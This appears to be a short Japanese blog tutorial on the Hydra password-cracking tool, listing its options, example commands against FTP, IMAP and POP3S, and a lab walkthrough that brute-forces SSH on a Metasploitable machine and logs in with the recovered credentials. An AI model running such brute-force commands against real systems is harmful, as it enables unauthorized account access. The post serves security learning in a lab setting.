attack

Hydraでパスワードクラックを行う

 

パスワードクラッキングツールのHydraについて解説します。

 

Hydraのオプション

 

-R

破棄されたセッションを戻す

-S

SSLコネクション

-l

ログイン名

-L ファイル

ログイン名リスト

-p

パスワード

-P ファイル

パスワードリスト

-x 

総当りで作り出すcharsetの最大最小

 

 

Hydraの使用例

 

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

hydra -C default.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

 

実践【kalilinux×hydra×metasploitable】

 

パスワードクラックで使用する辞書をkalilinuxにデフォルトで入っている辞書から選択します。

 

以下コマンドで辞書一覧を確認できます。

cd /usr/share/wordlists/metasploit

ls

 

今回はpiata_ssh_userpass.txtを使います。

 

ユーザーとパスワードは別ファイルにまとめます。

 

logins.txt

 

 

pwds.txt

 

 

以下コマンドを実行します。

192.168.0.13はターゲット(metasploitable)IPです。

hydra -L logins.txt -P pwsa.txt 192.168.0.13 ssh

 

 

 

見事ヒットしました

 

実際に侵入できるか確認

 

ssh msfadmin@192.168.0.13

pass:msfadmin

 

-attack

© 2021 ストロテクトNote